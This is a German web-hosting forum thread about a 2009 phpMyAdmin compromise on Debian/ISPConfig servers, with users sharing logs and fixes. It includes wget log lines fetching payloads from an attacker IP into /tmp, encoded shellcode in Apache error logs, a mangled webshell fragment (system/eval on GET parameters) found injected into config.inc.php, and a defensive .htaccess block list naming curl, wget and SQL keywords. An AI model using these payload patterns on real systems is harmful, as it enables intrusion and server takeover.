Nach Wochenende kein Zugriff mehr auf phpmyadmin... Debian 5 + ISPconfig3

J

jogy

New Member
Das ist ja interessant. Der Angriff scheint vom gleichen Server. Habe auch am 20.06.2009 die folgenden Einträge:

Code: 
--2009-06-20 04:49:45--  [url]http://188.24.51.xxx/50.txt[/url]
Connecting to 188.24.51.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17838 (17K) [text/plain]
Saving to: `/tmp/50.txt'

     0K .......... .......                                    100% 67.6K=0.3s

2009-06-20 04:49:56 (67.6 KB/s) - `/tmp/50.txt' saved [17838/17838]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--2009-06-20 04:52:23--  [url]http://188.24.51.xxx/51.txt[/url]
Connecting to 188.24.51.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17839 (17K) [text/plain]
Saving to: `/tmp/51.txt'

     0K .......... .......                                    100% 75.6K=0.2s

2009-06-20 04:52:30 (75.6 KB/s) - `/tmp/51.txt' saved [17839/17839]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
sh: fetch: command not found
sh: line 0: kill: ?: arguments must be process or job IDs
sh: line 0: kill: S: arguments must be process or job IDs
sh: line 0: kill: 1:24: arguments must be process or job IDs
sh: line 0: kill: /usr/sbin/apache/log: arguments must be process or job IDs

Aufgrund der Fehlermeldungen gege ich davon aus, dass der Angriff erfolglos war. Wie sieht es denn bei Dir weiter im Log aus?
 
H

h4nnib4l123

New Member
Offensichtlich war es derselbe attacker...

Ich habe allerdings nur einen Eintrag in den error.log.X Dateien dieser Art gefunden.

Was allerdings seit der Attacke öfter auftritt ist der Versuch kodierten Shellcode einzuflösen:
[Tue Jun 23 07:27:53 2009] [error] [client 90.186.247.XXX] Invalid method in request x\x01T\x90_o\x820\x14\xc5\xdfI\xf8\x0e\xf7\xd1m\xfd\x03(\x8a\x9a=\x18g\xe6\xb2\xb9-\x11\xb3\xe7
[Tue Jun 23 07:28:43 2009] [error] [client 90.186.247.XXX] Invalid method in request x\x01T\x90_o\x820\x14\xc5\xdfI\xf8\x0e\xf7\xd1m\xfd\x03(\x8a\x9a=\x18g\xe6\xb2\xb9-\x11\xb3\xe7
[Tue Jun 23 07:28:44 2009] [error] [client 90.186.247.XXX] Invalid method in request x\x01<OMo\xab0\x10\xbc#\xf1\x1fV=\xb5\x116\x98\xef\x10\xf5\x10\xa5QR\xa5\xb4O
[Tue Jun 23 07:28:49 2009] [error] [client 90.186.247.XXX] Invalid method in request x\x01T\x90_o\x820\x14\xc5\xdfI\xf8\x0e\xf7\xd1m\xfd\x03(\x8a\x9a=\x18g\xe6\xb2\xb9-\x11\xb3\xe7
[Tue Jun 23 07:29:00 2009] [error] [client 90.186.247.XXX] Invalid method in request x\x01T\x90_o\x820\x14\xc5\xdfI\xf8\x0e\xf7\xd1m\xfd\x03(\x8a\x9a=\x18g\xe6\xb2\xb9-\x11\xb3\xe7

<----SNIP---->

[Wed Jun 24 21:09:03 2009] [error] [client 77.24.15.XXX] Invalid URI in request x\x01\\\x91[o\xa30\x10\x85\xdf\x91\xf8\x0f~\xaaz\x01cC\x88\xb9\bUQ\x9am\xaam\xbb\xd1&\xd5>;\xf6@\xacP\xccr\t(\xbf~\x1dzy\xd8\xb7\xa3\x99\xa3\xef\xcc\xd1<\xaev\xc8S\x95\x84\x11\xd7\x87\xfa\x9e\x8bN\xe9*\xab\x1b\x9d\xab\xf2J\xea\xec\xa4`\xb8j\x0fz\xc8|F\xe7h\xbd\xdbm<\x8a\xa9m-\x84\x80\xbaKP\x07c\xe7\x1d\xba\xf7\xd2\xe1u]*\xc1/

<----SNIP---->

[Wed Jun 24 21:53:29 2009] [error] [client 62.112.140.XXX] script '/usr/share/phpmyadmin/scripts/setup.php' not found or unable to stat

<----SNIP--->

[Sat Jun 27 04:04:51 2009] [error] [client 62.112.140.XXX] script '/usr/share/phpmyadmin/scripts/setup.php' not found or unable to stat

<----SNIP---->

[Sat Jun 27 05:01:23 2009] [error] [client 194.72.238.XXX] Invalid method in request \x16\x03
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.
Danke für die PM.
Ich werde es mir mit meinen begrenzten Möglichkeiten mal anschauen :)
 
J

jogy

New Member
Apache Basisschutz installieren

touch /usr/share/phpmyadmin/.htaccess
dann den folgenden Code einfügen in die .htaccess:

Code: 
RewriteEngine On
Options +FollowSymLinks
ServerSignature Off

RewriteCond %{REQUEST_METHOD}  ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{THE_REQUEST}     ^.*(\\r|\\n|%0A|%0D).* [NC,OR]
RewriteCond %{HTTP_REFERER}    ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_COOKIE}     ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{REQUEST_URI}     ^/(,|;|:|<|>|">|"<|/|\\\.\.\\).{0,9999}.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*(/*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*\.[A-Za-z0-9].* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC]

Damit ist phpmyadmin mit einem Basischutz versehen.
 
J

jogy

New Member
Debian 5 geschützt mit Suhosin

Debian 5 ist automatisch mit Suhosin geschützt. http://www.hardened-php.net/ Deshalb dürfte m.E. kein "Schadcode" ausgeführt worden sein:

Another common error in these books is that they spread the urban legend that the most dangerous problem within PHP “remote code inclusion vulnerabilities” can be fixed by disabling allow_url_fopen in the configuration (or allow_url_include in PHP 5.2.x). This information is simply wrong, because these configuration directives do NOT protect against attacks through php://input or data:// URLs. Our Suhosin and the former Hardening-Patch are the only available protections that close all URL include attacks.
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.
 
M

mrairbrush

Member
phpMyAdmin 3.1.3.2 behebt angeblich das Problem. Komisch nur das ich das mir version
phpMyAdmin - 2.11.8.1deb5 angezeigt wird. Ist die nun völlig veraltet. Ist im aktuellen Image von Hetzner
 
A

Andinho

New Member
ich hatte das gleiche Problem.
hatte das in der config.inc.php stehen:
'host_______if___GET__c____echo___pre___system___GET__c____e cho____pre____if___GET__p____echo___pre___eval___GET__p____echo____pre_______

Das war anscheinend ne Attacke die hier beschrieben wird:

http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/
(edit: ok grade gesehen, dass das schon gepostet wurde)

Beim nächsten Aufruf von phpmyadmin wird sie neu angelegt und es funktioniert wieder.

Jetzt mal ein update vom phpmyadmin machen.
Aber irgendwie scheinen bei mir die Sonderzeichen nicht rübergekommen zu sein.
Ich finde auch nichts in den Logfiles (was hoffentlich ein gutes und kein schlechtes Zeichen ist oO)
 
Zuletzt bearbeitet:
F

Falcon37

New Member
Mein .htaccess Schutz funktioniert nicht mher

Mein .htaccess Schutz funktioniert auf einmal nicht mehr, also phpMyAdmin ist einfach so erreichbar. Die .htaccess Dateien existieren aber und beide haben die Rechte rw-r--r-- (0644). Ist seit die vorletzten ISPConfig 3 Update so, glaub aber nicht das es daran liegt. Jemand vielleicht ne Idee?
 
T

Till

Administrator
Füge mal entsprechende allowOverride Rules für das Verzeichnis /usr/share/phpmyadmin in der apache2.conf datei hinzu.
 
F

Falcon37

New Member
Versuche es jetzt schon seit einigen Wochen, jetzt muss ich leider aber doch fragen... was sind "entsprechende allowOverride Rules" ?:(
 
F

Falcon37

New Member
Das geht leider auch nicht. /etc/apache2/apache2.conf ist doch die korrekte Datei oder lieg ich da falsch? Habe alle Einträge auch mit der Datei /etc/phpmyadmin/apache.conf mal getestet.
 
Zuletzt bearbeitet:
T

Till

Administrator
Ich versteh wirklich nicht, warum es bei Dir nicht geht :( Wenn gernichts hilft, musst Du notfalls die Zeilen:

<Directory />
AllowOverride None
Order Deny,Allow
Deny from all
</Directory>

in der Datei:

/etc/apache2/sites-enabled/000-ispconfig.conf

auskommentieren und dann apache neu starten.
 
F

Falcon37

New Member
Zitat von Till:
Ich versteh wirklich nicht, warum es bei Dir nicht geht :(
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.
Ich auch nicht :D Habe sogar einen Server mehrfach nur wegem diesem neu installiert; und es geht auf wirklich keinem. Ich werde jetzt nochmal alles in diesem Thema durchgehen, und sollte es dann wieder nicht gehen die Notlösung nehmen oder einfach phpmyadmin deinstallieren.

Oder kann man vielleicht einfach den Pfad von phpmyadmin ändern?
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Werbung

Top